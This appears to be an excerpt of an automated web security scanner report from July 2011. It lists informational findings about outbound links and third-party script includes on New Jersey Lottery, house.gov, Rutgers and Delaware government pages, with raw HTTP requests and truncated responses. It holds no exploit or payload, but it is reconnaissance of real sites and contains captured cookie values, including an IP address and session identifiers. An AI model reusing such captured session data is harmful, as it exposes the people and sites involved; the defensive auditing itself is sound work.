<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<param name="movie" value="http://www.ustream.tv/flash/viewer.swf"/>
<embed flashvars="autoplay=ture&amp;brand=embed&amp;cid=8382854&amp;v3=1" width="480" height="296" allowfullscreen="true" allowscriptaccess="always" id="utv741572" name="utv_n_717400" src="http://www.ustream.tv/flash/viewer.swf" type="application/x-shockwave-flash" />
</object><br />
<a href="http://www.ustream.tv/" style="padding: 2px 0px 4px; width: 400px; background: #ffffff; display: block; color: #000000; font-weight: normal; font-size: 10px; text-decoration: underline; text-align: center;" target="_blank">Live Broadcast by Ustream.TV</a>
...[SNIP]...
<p align="left"><a href="http://www.ustream.tv/user/njlottery/videos" target="_blank">View previous New Jersey Lottery Drawings here</a>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.21. http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/instant/2-0_instant_games.shtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/instant/2-0_instant_games.shtml?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:21 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.22. http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/multimedia/9-0_multimedia.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/multimedia/9-0_multimedia.htm?2 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:29 GMT
Content-length: 47620
Content-type: text/html
Last-modified: Fri, 01 Jul 2011 12:04:04 GMT
Etag: "ba04-4e0db7b4"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div id="video">
<iframe width="560" height="349" src="http://www.youtube.com/embed/5hDSogD8t3U?rel=0" frameborder="0" allowfullscreen></iframe>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.23. http://www.state.nj.us/lottery/news/5-0_news.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/news/5-0_news.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/news/5-0_news.htm?2 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 41359
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:44 GMT
Etag: "a18f-4e1c3eec"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.24. http://www.state.nj.us/lottery/retailer/7-0_retailer.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/retailer/7-0_retailer.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/retailer/7-0_retailer.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:27 GMT
Content-length: 13612
Content-type: text/html
Last-modified: Wed, 06 Jul 2011 17:28:57 GMT
Etag: "352c-4e149b59"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.25. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/vip/3-0_vip_gen_info.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/vip/3-0_vip_gen_info.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:22 GMT
Content-length: 14721
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 12:47:20 GMT
Etag: "3981-4e1af0d8"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.26. http://www.state.nj.us/lottery/where/4-0_where.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/where/4-0_where.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/where/4-0_where.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:23 GMT
Content-length: 25779
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 15:05:53 GMT
Etag: "64b3-4e1b1151"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

13. Cross-domain script include  previous  next
There are 86 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


13.1. http://climate.rutgers.edu/njwxnet/station.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://climate.rutgers.edu
Path:   /njwxnet/station.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njwxnet/station.php HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19985


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Cream Ridge, NJ - Forecast, Radar and Current Weather - NJWxnet</title>
   <link rel="st
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

13.2. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">


<script type="text/javascript">


var codes
...[SNIP]...
</script>
<script src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/prettify/prettify_core_compiled.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/ph_core.js"></script>
...[SNIP]...

13.3. http://code.google.com/p/swfobject/wiki/documentation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/wiki/documentation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/swfobject/wiki/documentation HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:43 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">


<link rel="canonical" href="http
...[SNIP]...
</form>


<script src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/prettify/prettify.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/dit_scripts.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/ph_core.js"></script>
...[SNIP]...

13.4. http://docs.jquery.com/Tutorials:Introducing_$(document  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /Tutorials:Introducing_$(document

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Tutorials:Introducing_$(document HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 13 Jul 2011 01:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 14566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

13.5. http://docs.jquery.com/UI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 13 Jul 2011 01:51:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-language: en
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

13.6. http://docs.jquery.com/UI/Effects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 13 Jul 2011 01:51:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

13.7. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://egov.dnrec.delaware.gov
Path:   /egovpublic/dnrec/disp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /egovpublic/dnrec/disp?doc=LoginScreen&deptPath=public&op=showDefault&dept=5 HTTP/1.1
Host: egov.dnrec.delaware.gov
Connection: keep-alive
Referer: http://www.delaware.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522495650:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:01:40 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 35610
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html lang="en-us">
<head>
<!-- CLFeGov v2.2 - 12/15/2004 -->
<m
...[SNIP]...
<td width="15%" align="left">

<script src=https://seal.verisign.com/getseal?host_name=egov.dnrec.delaware.gov&size=M&use_flash=NO&use_transparent=NO&lang=en></script>
...[SNIP]...

13.8. http://grimm.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grimm.house.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

13.9. http://israel.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://israel.house.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bd1ea992a11d2ce"></script>
...[SNIP]...

13.10. http://itunes.apple.com/app/delaware-fresh/id446665507  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /app/delaware-fresh/id446665507

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /app/delaware-fresh/id446665507 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 13 Jul 2011 02:01:31 GMT
x-apple-orig-url-path: /app/delaware-fresh/id446665507
x-apple-application-site: NWK
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Tue Jul 12 19:01:31 PDT 2011, Expires Tue Jul 12 19:02:31 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=446665507
x-apple-application-instance: 1002704
Content-Type: text/html; charset=UTF-8
x-webobjects-loadaverage: 0
Content-Length: 29824
Vary: Accept-Encoding
Cache-Control: no-transform, max-age=60
Date: Wed, 13 Jul 2011 02:01:31 GMT
Connection: close
X-Apple-Partner: origin.0

